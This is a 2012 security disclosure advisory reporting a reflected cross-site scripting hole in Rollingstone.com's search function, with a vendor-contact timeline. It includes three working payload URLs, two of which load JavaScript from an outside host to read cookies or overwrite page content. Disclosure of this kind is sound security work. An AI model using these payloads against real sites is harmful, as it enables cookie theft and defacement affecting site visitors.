----------------------------------------------------------------------------------------------------
Title		: Rollingstone.com reflected Cross Site Scripting  (XSS) vulnerability

Vendor		: Wenner Media (http://www.jannswenner.com/)

Description	: Rollingstone.com web-site is vulnerable to reflected Cross-site Scripting attacks

Advisory time-line:
----------------------------------------------------------------------------------------------------
- Vendor notified		: 26-30 October and 6-8 November - no responses 
- Packet Storm advisory	: 15-Nov-2012

Test environment
----------------------------------------------------------------------------------------------------
- Latest Firefox browser


Details
----------------------------------------------------------------------------------------------------
Affected functionality: site search

Test #1: Remote Javascript execution: display browser cookie
http://www.rollingstone.com/search?q=%22%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fidash.net%2Fxs.js%3E%3C%2FSCRIPT%3E&x=0&y=0

Test #2, Remote Javascript execution: overwrite HTML content
http://www.rollingstone.com/search?q=%22%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fidash.net%2Ffr.js%3E%3C%2FSCRIPT%3E&x=0&y=0

Test #3, Simple alert
http://www.rollingstone.com/search?q=%22%3E%3CSCRIPT%3Eprompt%28%2FXSS%2F%29%3C%2FSCRIPT%3E

Note: the test cases are not malicious.

Researcher
----------------------------------------------------------------------------------------------------
Janne Ahlberg 
Project site: http://idash.net
Twitter: https://twitter.com/JanneFI
----------------------------------------------------------------------------------------------------